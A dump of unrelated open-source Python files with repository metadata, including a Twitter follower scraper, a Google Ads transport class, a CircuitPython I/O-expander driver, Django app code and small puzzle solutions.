# 'batchdone' persists scraper progress between runs in the ScraperWiki
# key/value store, so an interrupted run resumes near where it stopped.
batchdone = scraperwiki.sqlite.get_var('batchdone', 1)
batchstart = batchdone - 1
if batchstart < 1:
    batchstart = 1
# Take 100 at a time, and do one lookup call for each batch
c = 0
for follower_list in group(followers_json, 100):
    c = c + 1
    if c < batchstart:
        # Skip batches already completed by a previous run.
        continue
    # print "number", c, "out of", len(followers_json) / 100
    # print 'batch of ids:', follower_list
    url = 'http://api.twitter.com/1/users/lookup.json?user_id=%s' % (urllib2.quote(','.join(map(str, follower_list))))
    # print 'getting url:', url
    details_json = simplejson.loads(scraperwiki.scrape(url))
    for detail in details_json:
        # Flatten the profile fields we care about into one row per follower.
        data = {'screen_name': detail['screen_name'],
            'id': detail['id'],'location': detail['location'],
            'bio': detail['description'],
            'followers_count': detail['followers_count'],
            'friends_count': detail['friends_count'],
            'statuses_count': detail['statuses_count'],
            'listed_count': detail['listed_count'],
            'url': detail['url'],
            'verified': detail['verified'],
            'time_zone': detail['time_zone']}
        # print "Found person", data
        scraperwiki.sqlite.save(unique_keys=['id'], data = data)
    # Record progress after every batch so a crash resumes from here.
    scraperwiki.sqlite.save_var('batchdone', c)
| [
"pallih@kaninka.net"
] | pallih@kaninka.net |
b019fb5ae46827e1a3740f5c118317c74fa8262c | 9ae6ce54bf9a2a86201961fdbd5e7b0ec913ff56 | /google/ads/googleads/v9/services/services/account_budget_proposal_service/transports/base.py | f1aa4845ec900732bfa03bdd6987bbf629ad7d73 | [
"Apache-2.0"
] | permissive | GerhardusM/google-ads-python | 73b275a06e5401e6b951a6cd99af98c247e34aa3 | 676ac5fcb5bec0d9b5897f4c950049dac5647555 | refs/heads/master | 2022-07-06T19:05:50.932553 | 2022-06-17T20:41:17 | 2022-06-17T20:41:17 | 207,535,443 | 0 | 0 | Apache-2.0 | 2019-09-10T10:58:55 | 2019-09-10T10:58:55 | null | UTF-8 | Python | false | false | 4,520 | py | # -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import abc
import typing
import pkg_resources
import google.auth # type: ignore
from google.api_core import gapic_v1
from google.auth import credentials as ga_credentials # type: ignore
from google.ads.googleads.v9.resources.types import account_budget_proposal
from google.ads.googleads.v9.services.types import (
account_budget_proposal_service,
)
try:
DEFAULT_CLIENT_INFO = gapic_v1.client_info.ClientInfo(
gapic_version=pkg_resources.get_distribution("google-ads",).version,
)
except pkg_resources.DistributionNotFound:
DEFAULT_CLIENT_INFO = gapic_v1.client_info.ClientInfo()
class AccountBudgetProposalServiceTransport(metaclass=abc.ABCMeta):
    """Abstract transport class for AccountBudgetProposalService."""
    AUTH_SCOPES = ("https://www.googleapis.com/auth/adwords",)
    def __init__(
        self,
        *,
        host: str = "googleads.googleapis.com",
        credentials: ga_credentials.Credentials = None,
        client_info: gapic_v1.client_info.ClientInfo = DEFAULT_CLIENT_INFO,
    ) -> None:
        """Instantiate the transport.

        Args:
            host: Hostname (optionally ``host:port``) of the service endpoint.
                Port 443 (HTTPS) is assumed when no port is given.
            credentials: Authorization credentials attached to requests; when
                omitted, Application Default Credentials are resolved from
                the environment.
            client_info: Client info used to build the user-agent string sent
                with API requests. Only needed when developing your own
                client library.
        """
        # Normalise the endpoint: append the default HTTPS port when the
        # caller supplied a bare hostname.
        if ":" not in host:
            host += ":443"
        self._host = host
        # Resolve Application Default Credentials when none were supplied.
        if credentials is None:
            credentials, _ = google.auth.default(scopes=self.AUTH_SCOPES)
        self._credentials = credentials
        # Kept as a separate method so tests can stub out the wrapping step.
        self._prep_wrapped_messages(client_info)
    def _prep_wrapped_messages(self, client_info):
        # Wrap each RPC with gapic metadata (timeout defaults + user-agent).
        self._wrapped_methods = {
            self.get_account_budget_proposal: gapic_v1.method.wrap_method(
                self.get_account_budget_proposal,
                default_timeout=None,
                client_info=client_info,
            ),
            self.mutate_account_budget_proposal: gapic_v1.method.wrap_method(
                self.mutate_account_budget_proposal,
                default_timeout=None,
                client_info=client_info,
            ),
        }
    def close(self):
        """Closes resources associated with the transport.

        .. warning::
            Only call this method if the transport is NOT shared
            with other clients - this may cause errors in other clients!
        """
        raise NotImplementedError()
    @property
    def get_account_budget_proposal(
        self,
    ) -> typing.Callable[
        [account_budget_proposal_service.GetAccountBudgetProposalRequest],
        account_budget_proposal.AccountBudgetProposal,
    ]:
        # Concrete transports (e.g. gRPC) must expose the RPC callable here.
        raise NotImplementedError
    @property
    def mutate_account_budget_proposal(
        self,
    ) -> typing.Callable[
        [account_budget_proposal_service.MutateAccountBudgetProposalRequest],
        account_budget_proposal_service.MutateAccountBudgetProposalResponse,
    ]:
        # Concrete transports (e.g. gRPC) must expose the RPC callable here.
        raise NotImplementedError
__all__ = ("AccountBudgetProposalServiceTransport",)
| [
"noreply@github.com"
] | GerhardusM.noreply@github.com |
f1caa1d51454453d66b6f77be2fd0f473f85a711 | 9d1ef7993bf0df9967b1e7a79d5913fbc3e3a7e1 | /util.py | 685621eda555f1de7649a2fbe36382c343b6b420 | [
"BSD-2-Clause"
] | permissive | mitmedialab/WhatWeWatch-Analysis | f6f4fbd8fba4ef6a58f4961c7f3d9b9519dae3a4 | cc01dee4e77155c8aec7638e4275172053db3247 | refs/heads/master | 2021-05-28T05:40:36.678808 | 2014-11-03T01:22:26 | 2014-11-03T01:22:26 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,798 | py | import csv
import datetime
import json
import math
import os
import random
import numpy as np
dirname = os.path.dirname(os.path.realpath(__file__))
# Load the ISO country table shipped next to this module and index it by
# lower-cased alpha-3 code for O(1) lookups via country_info / country_name().
with open(os.path.join(dirname, 'country_info.json'), 'rb') as f:
    country_list = json.loads(f.read())
country_info = dict()
for country in country_list:
    alpha3 = country['alpha-3'].lower()
    country_info[alpha3] = {
        'name': country['name']
        , 'alpha3': alpha3
    }
def country_name(alpha3):
    """Return the country name for a lower-cased ISO alpha-3 code."""
    record = country_info[alpha3]
    return record['name']
def write_results_csv(experiment, run, filename, data, headers):
    """Write `headers` then `data` rows (comma-joined) to
    results/<experiment>/<run>/<filename>.csv, creating directories first."""
    create_result_dir(experiment, run)
    out_path = 'results/%s/%s/%s.csv' % (experiment, run, filename)
    # Assemble all lines up front, then write them in one go; output bytes
    # are identical to writing header and rows one at a time.
    lines = [','.join(headers)]
    lines.extend(','.join(str(field) for field in row) for row in data)
    with open(out_path, 'wb') as out:
        out.write("\n".join(lines))
        out.write("\n")
def create_result_dir(experiment, run):
    """Ensure results/<experiment>/<run> exists, creating parents as needed.

    Replaces the original stat-then-mkdir chain, which was both verbose and
    racy (the directory could appear/disappear between the check and the
    mkdir), with a single EAFP makedirs call. Works on Python 2 and 3.
    """
    path = os.path.join('results', experiment, run)
    try:
        os.makedirs(path)
    except OSError:
        # Already-exists is the common, harmless case; re-raise real failures
        # (e.g. permission errors) instead of hiding them.
        if not os.path.isdir(path):
            raise
class VideoData(object):
    """In-memory view of (date, country, video) rows plus a country-by-video
    count matrix. NOTE(review): Python 2 code (reader.next(), iteritems,
    print statement) -- keep that in mind before reuse."""
    @classmethod
    def from_csv(cls, filename, filter_single=False):
        """Build a VideoData from a CSV of (date, country, video_id) rows."""
        # Read data file
        with open(filename, 'rb') as f:
            reader = csv.reader(f)
            # Skip header and read rows
            reader.next()
            rows = []
            for row in reader:
                date = row[0].strip()
                loc = row[1].strip().lower()
                vid_id = row[2].strip()
                rows.append((date, loc, vid_id))
        return VideoData(rows, filter_single=filter_single)
    def __init__(self, rows, proto=None, filter_single=False):
        '''Load data from a csv and create useful representations'''
        # Load basic data
        if proto is None:
            self.countries = set()
            self.videos = set()
            self.dates = set()
            self.pairs = list()
            self.dates_vid_cid = {}
            self.vids_by_cid = {}
            self.rows_by_date = {}
            self.cids_by_vid = {}
        else:
            # Re-use the prototype's country/video universe (and, below, its
            # lookups) so counts stay index-compatible with `proto`.
            self.countries = proto.countries
            self.videos = proto.videos
            self.dates = set()
            self.pairs = list()
            self.dates_vid_cid = {}
            self.vids_by_cid = {}
            self.rows_by_date = {}
            self.cids_by_vid = {}
        # Process rows
        for row in rows:
            date = row[0]
            loc = row[1]
            vid_id = row[2]
            if proto is None:
                self.countries.add(loc)
                self.videos.add(vid_id)
            self.rows_by_date[date] = self.rows_by_date.get(date,[]) + [(date, loc, vid_id)]
            self.dates.add(date)
            self.pairs.append((loc, vid_id))
            self.vids_by_cid[loc] = self.vids_by_cid.get(loc, set()).union(set([vid_id]))
            self.cids_by_vid[vid_id] = self.cids_by_vid.get(vid_id, set()).union(set([loc]))
            # Store video dates by location by video id
            self.dates_vid_cid[vid_id] = self.dates_vid_cid.get(vid_id, dict())
            self.dates_vid_cid[vid_id][loc] = self.dates_vid_cid[vid_id].get(loc, list())
            y,m,d = date.split('-')
            self.dates_vid_cid[vid_id][loc].append(datetime.date(int(y), int(m), int(d)))
        # Optionally drop videos seen in fewer than two countries.
        exclude = set()
        if proto is None and filter_single:
            for vid, cids in self.cids_by_vid.iteritems():
                if len(cids) < 2:
                    exclude.add(vid)
            self.videos = [x for x in self.videos if not x in exclude]
        # Country and video lookups
        if proto is None:
            self.country_lookup = Lookup(sorted(self.countries))
            self.video_lookup = Lookup(sorted(self.videos))
        else:
            self.country_lookup = proto.country_lookup
            self.video_lookup = proto.video_lookup
        # Calculate counts
        num_countries = len(self.countries)
        num_videos = len(self.videos)
        print 'Creating data with %d countries and %d videos' % (num_countries, num_videos)
        counts = np.zeros((num_countries, num_videos))
        for loc, vid_id in self.pairs:
            try:
                vid_index = self.video_lookup.get_id(vid_id)
                loc_index = self.country_lookup.get_id(loc)
                counts[loc_index][vid_index] += 1
            except KeyError:
                # Pairs referencing filtered-out videos are simply skipped.
                pass
        self.counts = counts
    def cross_validation_sets(self, num_folds=10):
        '''Return a list of (training, test) pairs from this data set.'''
        # Folds are built from whole dates so a date never straddles folds.
        dates = self.rows_by_date.keys()
        random.shuffle(dates)
        per_fold = int(math.floor(len(dates) / num_folds))
        folds = []
        for k in range(num_folds):
            fold = []
            for i in range(per_fold):
                date_rows = self.rows_by_date[dates.pop()]
                for row in date_rows:
                    if row[2] in self.videos:
                        fold.append(row)
            folds.append(fold)
        cv = CrossValidation()
        for k in range(num_folds):
            training = sum(folds[:k] + folds[k+1:], [])
            test = folds[k]
            cv.add_fold(training, test)
        return cv
    def rows_to_counts(self, rows):
        """Map (date, loc, vid) rows onto a counts matrix shaped like self.counts."""
        counts = np.zeros(self.counts.shape)
        for date, loc, vid_id in rows:
            v = self.video_lookup.tok2id[vid_id]
            c = self.country_lookup.tok2id[loc]
            counts[c,v] += 1
        return counts
class CrossValidation(object):
    """Ordered container of (training, test) splits."""
    def __init__(self):
        # Each entry is a (training_rows, test_rows) pair.
        self.folds = []
    def add_fold(self, training, test):
        """Append one (training, test) split."""
        self.folds.append((training, test))
    def get_fold_training(self, i):
        """Return the training rows of fold `i`."""
        training, _ = self.folds[i]
        return training
    def get_fold_test(self, i):
        """Return the test rows of fold `i`."""
        _, test = self.folds[i]
        return test
    def __len__(self):
        return len(self.folds)
class Lookup(object):
    """Bidirectional mapping between tokens and dense integer ids."""
    def __init__(self, tokens):
        '''Create a two-way lookup between tokens and unique integer ids.'''
        # Ids are assigned in first-seen order; duplicate tokens are skipped.
        self.tok2id = {}
        self.id2tok = {}
        for tok in tokens:
            if tok in self.tok2id:
                continue
            new_id = len(self.tok2id)
            self.tok2id[tok] = new_id
            self.id2tok[new_id] = tok
    def get_token(self, id):
        '''Get a named token from an integer id.'''
        return self.id2tok[id]
    def get_id(self, tok):
        '''Get an integer id for the named token.'''
        return self.tok2id[tok]
    def __len__(self):
        return len(self.id2tok)
| [
"ed@elplatt.com"
] | ed@elplatt.com |
1652ad9daf15db0ca2e2d44b9f59139dd7a652db | 4142b8c513d87361da196631f7edd82f11465abb | /python/630/630I.py | 6cde5d177d6668156063078b87be1d83a647c71e | [] | no_license | npkhanhh/codeforces | b52b66780426682ea1a3d72c66aedbe6dc71d7fe | 107acd623b0e99ef0a635dfce3e87041347e36df | refs/heads/master | 2022-02-08T17:01:01.731524 | 2022-02-07T10:29:52 | 2022-02-07T10:29:52 | 228,027,631 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 169 | py | import math
n = int(input())
# Total positions in the row; presumably the 2*n - 2 spaces of CF 630I.
space = 2 * n - 2
rs = space - n  # slack positions once the required length-n run is placed
# Closed-form count. NOTE(review): derivation is not shown here; the
# constants look like (2 row ends) x (4 make choices) x (3 constrained
# neighbour choices) with 4 free choices per remaining slot -- verify
# against the problem editorial before relying on this reading.
res = 2 * 4 * 3 * pow(4, rs - 1)
if n > 3:
    # Interior placements exist only when there is room beyond the ends.
    res += 3 * 4 * 3 * pow(4, rs - 2) * (rs - 1)
print(res)
| [
"npkhanh93@gmail.com"
] | npkhanh93@gmail.com |
fff590cd8a782b6dfd6b9e833ebce514704de1a4 | a0dbc48f31cf3fbddd3cc7672cf3db415cb391c4 | /compiler/drc/__init__.py | 40e3a45cdbd01353b65a987887e550f8c1438711 | [
"BSD-3-Clause"
] | permissive | wangyaobsz/OpenRAM | 4178ef93816b233bac0aaecc580e2cbd235ac39d | 0d616ae072e6c42a0d8a006eebc681408502e956 | refs/heads/master | 2022-08-23T07:51:39.745708 | 2022-07-21T16:37:24 | 2022-07-21T16:37:24 | 113,813,373 | 1 | 0 | null | 2017-12-11T04:47:53 | 2017-12-11T04:47:52 | null | UTF-8 | Python | false | false | 180 | py | from .custom_cell_properties import *
from .custom_layer_properties import *
from .design_rules import *
from .module_type import *
from .drc_lut import *
from .drc_value import *
| [
"mrg@ucsc.edu"
] | mrg@ucsc.edu |
05367742808db1ee40d5e26a98bd238f59c9e1c5 | 9ac405635f3ac9332e02d0c7803df757417b7fee | /geografia/apps.py | cf5d22eb8e0f1db20c056602cfb45571fd5e655b | [] | no_license | odecsarrollo/07_intranet_proyectos | 80af5de8da5faeb40807dd7df3a4f55f432ff4c0 | 524aeebb140bda9b1bf7a09b60e54a02f56fec9f | refs/heads/master | 2023-01-08T04:59:57.617626 | 2020-09-25T18:01:09 | 2020-09-25T18:01:09 | 187,250,667 | 0 | 0 | null | 2022-12-30T09:36:37 | 2019-05-17T16:41:35 | JavaScript | UTF-8 | Python | false | false | 93 | py | from django.apps import AppConfig
class GeografiaConfig(AppConfig):
    """Django application configuration for the `geografia` app."""
    name = 'geografia'
| [
"fabio.garcia.sanchez@gmail.com"
] | fabio.garcia.sanchez@gmail.com |
e638a1bce25a680fb36e833c918588d159a522d5 | 32809f6f425bf5665fc19de2bc929bacc3eeb469 | /src/1039-Minimum-Score-Triangulation-of-Polygon/1039.py | f87bf6ee51d479a31c606ff6a795632caf3e38a6 | [] | no_license | luliyucoordinate/Leetcode | 9f6bf01f79aa680e2dff11e73e4d10993467f113 | bcc04d49969654cb44f79218a7ef2fd5c1e5449a | refs/heads/master | 2023-05-25T04:58:45.046772 | 2023-05-24T11:57:20 | 2023-05-24T11:57:20 | 132,753,892 | 1,575 | 569 | null | 2023-05-24T11:57:22 | 2018-05-09T12:30:59 | C++ | UTF-8 | Python | false | false | 350 | py | class Solution:
def minScoreTriangulation(self, A: List[int]) -> int:
n = len(A)
dp = [[0] * n for i in range(n)]
for d in range(2, n):
for i in range(n - d):
j = i + d
dp[i][j] = min(dp[i][k] + dp[k][j] + A[i] * A[j] * A[k] for k in range(i + 1, j))
return dp[0][n - 1] | [
"luliyucoordinate@outlook.com"
] | luliyucoordinate@outlook.com |
443f9c31e65875c862b8d0538956fdb4badc4e8f | 313e29c735deecfe75ae603ff774f32a6574d159 | /home/migrations/0002_load_initial_data.py | eb9af5fcf0569de1f1b3fad3aab461a66bef3afb | [] | no_license | crowdbotics-apps/web-24-dev-3400 | 15513166c4316512671bb25ce7c048a2b8322b86 | 702f7cd25e31447f87d12625dcc86eb8a5bfd865 | refs/heads/master | 2023-05-30T19:28:40.871181 | 2020-04-24T13:46:18 | 2020-04-24T13:46:18 | 258,422,254 | 0 | 0 | null | 2021-06-12T18:05:52 | 2020-04-24T06:09:54 | Python | UTF-8 | Python | false | false | 1,281 | py | from django.db import migrations
def create_customtext(apps, schema_editor):
    """Data migration: seed the CustomText row with the app title."""
    CustomText = apps.get_model("home", "CustomText")
    customtext_title = "web 24"
    CustomText.objects.create(title=customtext_title)
def create_homepage(apps, schema_editor):
    """Data migration: seed the HomePage body shown on the landing page."""
    HomePage = apps.get_model("home", "HomePage")
    homepage_body = """
    <h1 class="display-4 text-center">web 24</h1>
    <p class="lead">
    This is the sample application created and deployed from the Crowdbotics app.
    You can view list of packages selected for this application below.
    </p>"""
    HomePage.objects.create(body=homepage_body)
def create_site(apps, schema_editor):
    """Data migration: point django.contrib.sites' Site (pk=1) at the
    deployed domain, keeping the app name in sync."""
    Site = apps.get_model("sites", "Site")
    custom_domain = "web-24-dev-3400.botics.co"
    site_params = {
        "name": "web 24",
    }
    if custom_domain:
        site_params["domain"] = custom_domain
    Site.objects.update_or_create(defaults=site_params, id=1)
class Migration(migrations.Migration):
    # Runs after the home models exist and the sites framework is migrated.
    dependencies = [
        ("home", "0001_initial"),
        ("sites", "0002_alter_domain_unique"),
    ]
    operations = [
        migrations.RunPython(create_customtext),
        migrations.RunPython(create_homepage),
        migrations.RunPython(create_site),
    ]
| [
"team@crowdbotics.com"
] | team@crowdbotics.com |
1c8040e3a1f1d9305eaa363c6c7d055c98c090ac | 42ffb5262adaaaba6477444cbc922c7e119ddb32 | /pycatia/tps_interfaces/particular_tol_elem.py | 14cc5542c7ebbd868c3ac0325b3425b85b072c07 | [
"MIT"
] | permissive | joaoantfig/pycatia | 0bdd03c489c87b982d45617f783b04ce167fd56a | 2d087d9861c76dbcdc4b19d99528d14649d1c45f | refs/heads/master | 2023-09-01T00:00:09.727160 | 2021-09-29T16:17:54 | 2021-09-29T16:17:54 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,879 | py | #! usr/bin/python3.6
"""
Module initially auto generated using V5Automation files from CATIA V5 R28 on 2020-09-25 14:34:21.593357
.. warning::
The notes denoted "CAA V5 Visual Basic Help" are to be used as reference only.
They are there as a guide as to how the visual basic / catscript functions work
and thus help debugging in pycatia.
"""
from pycatia.system_interfaces.any_object import AnyObject
class ParticularTolElem(AnyObject):
    """Access to the particular geometry of a toleranced element.

    Wraps the CATIA V5 ``ParticularTolElem`` automation interface
    (System.IUnknown -> ... -> System.AnyObject -> ParticularTolElem),
    originally auto-generated from V5Automation files (CATIA V5 R28).
    """
    def __init__(self, com_object):
        super().__init__(com_object)
        # Keep a direct handle on the underlying COM object for property access.
        self.particular_tol_elem = com_object
    @property
    def particular_geometry(self) -> str:
        """str: particular geometry of the toleranced element (read-only).

        CAA V5 Visual Basic Help: ``Property ParticularGeometry() As CATBSTR
        (Read Only)``. Documented values: "Not Defined", "CenterElement",
        "Surface", "Unsupported".
        """
        return self.particular_tol_elem.ParticularGeometry
    def __repr__(self):
        return f'ParticularTolElem(name="{ self.name }")'
| [
"evereux@gmail.com"
] | evereux@gmail.com |
26e4da7286661b314fb390dae31d023f75fe2622 | ad6f20ca36dc65e34b43c69db66f383554718fed | /OOPs/templates.py | 70b0ac5f07ef7984309df506657eb224cfe06582 | [] | no_license | atulanandnitt/questionsBank | 3df734c7389959801ab6447c0959c85f1013dfb8 | 477accc02366b5c4507e14d2d54850a56947c91b | refs/heads/master | 2021-06-11T21:39:24.682159 | 2021-05-06T17:54:18 | 2021-05-06T17:54:18 | 175,861,522 | 0 | 1 | null | 2020-05-02T09:26:25 | 2019-03-15T17:10:06 | Python | UTF-8 | Python | false | false | 873 | py | from string import Template
class MyTemplate(Template):
    # Placeholders use '#' (e.g. "#price") instead of Template's default '$'.
    delimiter = '#'
def Main():
    """Demo for MyTemplate: print one line per cart item and the grand total.

    Fixes two defects in the original:
      * the template "#price * #qty = #price" printed the unit price as the
        product (e.g. "12 * 2 = 12"), which is simply false output;
      * the total summed unit prices only, ignoring quantities.
    """
    cart = [
        dict(item='Coke', price=8, qty=1),
        dict(item='Cake', price=12, qty=2),
        dict(item='Fish', price=22, qty=4),
    ]
    line_tmpl = MyTemplate("#price * #qty")
    total = 0
    print(cart)
    for data in cart:
        # Compute the real line total in Python; Template only substitutes.
        line_total = data["price"] * data["qty"]
        print(line_tmpl.substitute(data) + " = " + str(line_total))
        total += line_total
    print("total " + str(total))
def summation(a, b, *args, **kwargs):
    """Sum `a`, `b`, all extra positional args and all keyword-arg values.

    Extra values are coerced with int(), matching the original behaviour.

    Fixes: the original printed ``kwargs['p']`` inside the kwargs loop, which
    (a) repeated the line once per keyword argument and (b) raised KeyError
    whenever 'p' was not passed. The debug print now runs once, only when
    'p' is present.
    """
    result = a + b
    for extra in args:
        result += int(extra)
    for value in kwargs.values():
        result += int(value)
    if 'p' in kwargs:  # guard: original crashed with KeyError when 'p' absent
        print("p is ", kwargs['p'])
    print("kwargs", kwargs, type(kwargs))
    print("args", args, type(args))
    return result
if __name__ == "__main__":
    # Demo entry point: render the cart, then exercise summation() with a
    # mix of positional and keyword arguments.
    Main()
    print(summation(1,2,3,4,5,p=1,q=2,r=4))
| [
"atul.anand.nitt@gmail.com"
] | atul.anand.nitt@gmail.com |
69bb140daaed69ba98843a48a802fa8cf3e5a5e5 | a34f722efe6b7b4c102464daebf61450d1fcb774 | /devel/test_series/gridded_noiseless_nofg.py | 41d51d04fafaf91d914ecf980e2b6f806ee8af0c | [
"MIT"
] | permissive | BellaNasirudin/py21cmmc_fg | 4eae59fc5c3647f48a0de5f2963473e92409241a | 928822d07760c481c7673c83c1b7bf4421310b31 | refs/heads/master | 2021-10-10T11:57:57.278899 | 2019-07-26T05:05:45 | 2019-07-26T05:05:45 | 131,949,549 | 1 | 3 | MIT | 2019-02-20T05:14:16 | 2018-05-03T06:10:13 | Jupyter Notebook | UTF-8 | Python | false | false | 876 | py | """
The first test in a series of tests to prove that this code works.
Here are the tests:
1. ** Gridded baselines, no thermal noise, no foregrounds
2. Gridded baselines, thermal noise, no foregrounds
3. MWA baselines, thermal noise, no foregrounds
4. Gridded baselines, thermal noise, point-source foregrounds
5. MWA baselines, thermal noise, point-source foregrounds
"""
from base_definitions import CustomCoreInstrument, CustomLikelihood, core_eor, run_mcmc, DEBUG
# Identifier used for the output chain files and the datafile name below.
model_name = "InstrumentalGridTest"
# Instrument core for test 1: gridded baselines, thermal noise disabled.
core_instr = CustomCoreInstrument(
    antenna_posfile = 'grid_centres', # use a special grid of *baselines*.
    Tsys = 0,
)
# Likelihood reads (or creates) its simulated data at data/<model_name>.npz.
likelihood = CustomLikelihood(
    datafile=[f'data/{model_name}.npz']
)
if __name__== "__main__":
    # Run the MCMC with the EoR core plus this instrument core.
    chain = run_mcmc(
        [core_eor, core_instr], likelihood,
        model_name=model_name, # Filename of main chain output
    )
| [
"steven.murray@curtin.edu.au"
] | steven.murray@curtin.edu.au |
571e9c49ac89ab60c4939efda633234705c25958 | c1960138a37d9b87bbc6ebd225ec54e09ede4a33 | /adafruit-circuitpython-bundle-py-20210402/lib/adafruit_mcp230xx/mcp230xx.py | 23b64f8c9d08030a7bc42a7c1083c134cdb63a14 | [] | no_license | apalileo/ACCD_PHCR_SP21 | 76d0e27c4203a2e90270cb2d84a75169f5db5240 | 37923f70f4c5536b18f0353470bedab200c67bad | refs/heads/main | 2023-04-07T00:01:35.922061 | 2021-04-15T18:02:22 | 2021-04-15T18:02:22 | 332,101,844 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,153 | py | # SPDX-FileCopyrightText: 2017 Tony DiCola for Adafruit Industries
# SPDX-FileCopyrightText: 2019 Carter Nelson
#
# SPDX-License-Identifier: MIT
"""
`mcp230xx`
====================================================
CircuitPython module for the MCP23017 and MCP23008 I2C I/O extenders.
* Author(s): Tony DiCola
"""
from adafruit_bus_device import i2c_device
__version__ = "2.4.5"
__repo__ = "https://github.com/adafruit/Adafruit_CircuitPython_MCP230xx.git"
# Global buffer for reading and writing registers with the devices. This is
# shared between both the MCP23008 and MCP23017 class to reduce memory allocations.
# However this is explicitly not thread safe or re-entrant by design!
_BUFFER = bytearray(3)
# pylint: disable=too-few-public-methods
class MCP230XX:
    """Base class for MCP230xx devices.

    All register helpers below share the module-level _BUFFER bytearray to
    avoid per-call allocations, so they are explicitly not thread safe or
    re-entrant (by design, per the module comment above).
    """

    def __init__(self, i2c, address):
        # I2CDevice wraps the bus and locks it for the duration of each
        # transaction with this device.
        self._device = i2c_device.I2CDevice(i2c, address)

    def _read_u16le(self, register):
        # Read an unsigned 16 bit little endian value from the specified 8-bit
        # register.
        with self._device as i2c:
            _BUFFER[0] = register & 0xFF
            # Write the register address, then read 2 bytes back into the same
            # shared buffer (bytes 1-2) without allocating.
            i2c.write_then_readinto(_BUFFER, _BUFFER, out_end=1, in_start=1, in_end=3)
            # Little endian: low byte first.
            return (_BUFFER[2] << 8) | _BUFFER[1]

    def _write_u16le(self, register, val):
        # Write an unsigned 16 bit little endian value to the specified 8-bit
        # register.
        with self._device as i2c:
            _BUFFER[0] = register & 0xFF
            _BUFFER[1] = val & 0xFF
            _BUFFER[2] = (val >> 8) & 0xFF
            i2c.write(_BUFFER, end=3)

    def _read_u8(self, register):
        # Read an unsigned 8 bit value from the specified 8-bit register.
        with self._device as i2c:
            _BUFFER[0] = register & 0xFF
            i2c.write_then_readinto(_BUFFER, _BUFFER, out_end=1, in_start=1, in_end=2)
            return _BUFFER[1]

    def _write_u8(self, register, val):
        # Write an 8 bit value to the specified 8-bit register.
        with self._device as i2c:
            _BUFFER[0] = register & 0xFF
            _BUFFER[1] = val & 0xFF
            i2c.write(_BUFFER, end=2)
"55570902+apalileo@users.noreply.github.com"
] | 55570902+apalileo@users.noreply.github.com |
a4e594df686f039ef10ff36ac5c9d74f148dde7e | 7cd760f1a570155ad001e53dd34cf7b5451bc099 | /mkt/installs/api.py | 7c584778313ea7bd8232dd6f95312c706f5fa19c | [] | no_license | l-hedgehog/zamboni | 6bab963b334a32bfc9b2e986dc657510f3d10602 | ef1f1849f42023bc684866879c854cdb84eef2f6 | refs/heads/master | 2020-12-25T00:28:19.982297 | 2013-08-21T23:34:35 | 2013-08-21T23:34:35 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,770 | py | from django.core.exceptions import PermissionDenied
import commonware.log
from rest_framework.decorators import (api_view, authentication_classes,
parser_classes, permission_classes)
from rest_framework.parsers import FormParser, JSONParser
from rest_framework.permissions import AllowAny
from rest_framework.response import Response
from mkt.api.authentication import (RestOAuthAuthentication,
RestSharedSecretAuthentication)
from mkt.constants.apps import INSTALL_TYPE_USER
from mkt.installs.forms import InstallForm
from mkt.installs.utils import install_type, record
from mkt.webapps.models import Installed
log = commonware.log.getLogger('z.api')
@api_view(['POST'])
@authentication_classes([RestOAuthAuthentication,
                         RestSharedSecretAuthentication])
@parser_classes([JSONParser, FormParser])
@permission_classes([AllowAny])
def install(request):
    """Record an install of an app for the requesting user (or anonymously).

    Returns 201 on a new install record, 202 when the user already had the
    app installed, 400 on invalid input; raises PermissionDenied when a
    plain user tries to install a non-public app.
    """
    request._request.CORS = ['POST']
    form = InstallForm(request.DATA, request=request)
    if not form.is_valid():
        return Response(status=400)

    app = form.cleaned_data['app']
    type_ = install_type(request, app)
    # Users can't install non-public apps; other install types (developers)
    # are allowed through.
    if not app.is_public() and type_ == INSTALL_TYPE_USER:
        log.info('App not public: {0}'.format(app.pk))
        raise PermissionDenied

    if request.amo_user:
        installed, created = Installed.objects.get_or_create(
            addon=app, user=request.amo_user, install_type=type_)
        record(request, app)
        if not created:
            return Response(status=202)
    else:
        record(request, app)
    return Response(status=201)
"amckay@mozilla.com"
] | amckay@mozilla.com |
9e599c20eb958a60b433edc477eca5ad091b8145 | a3cc7286d4a319cb76f3a44a593c4a18e5ddc104 | /lib/surface/compute/forwarding_rules/update.py | 1acf8e2ad2ecc220e60a5d576a2601ac864ccd9f | [
"LicenseRef-scancode-unknown-license-reference",
"Apache-2.0"
] | permissive | jordanistan/Google-Cloud-SDK | f2c6bb7abc2f33b9dfaec5de792aa1be91154099 | 42b9d7914c36a30d1e4b84ae2925df7edeca9962 | refs/heads/master | 2023-09-01T01:24:53.495537 | 2023-08-22T01:12:23 | 2023-08-22T01:12:23 | 127,072,491 | 0 | 1 | NOASSERTION | 2023-08-22T01:12:24 | 2018-03-28T02:31:19 | Python | UTF-8 | Python | false | false | 10,113 | py | # Copyright 2017 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Command to update forwarding-rules."""
from googlecloudsdk.api_lib.compute import base_classes
from googlecloudsdk.api_lib.compute import constants
from googlecloudsdk.api_lib.compute.operations import poller
from googlecloudsdk.api_lib.util import waiter
from googlecloudsdk.calliope import base
from googlecloudsdk.calliope import exceptions as calliope_exceptions
from googlecloudsdk.command_lib.compute import flags as compute_flags
from googlecloudsdk.command_lib.compute.forwarding_rules import flags
from googlecloudsdk.command_lib.util.args import labels_util
def _Args(cls, parser):
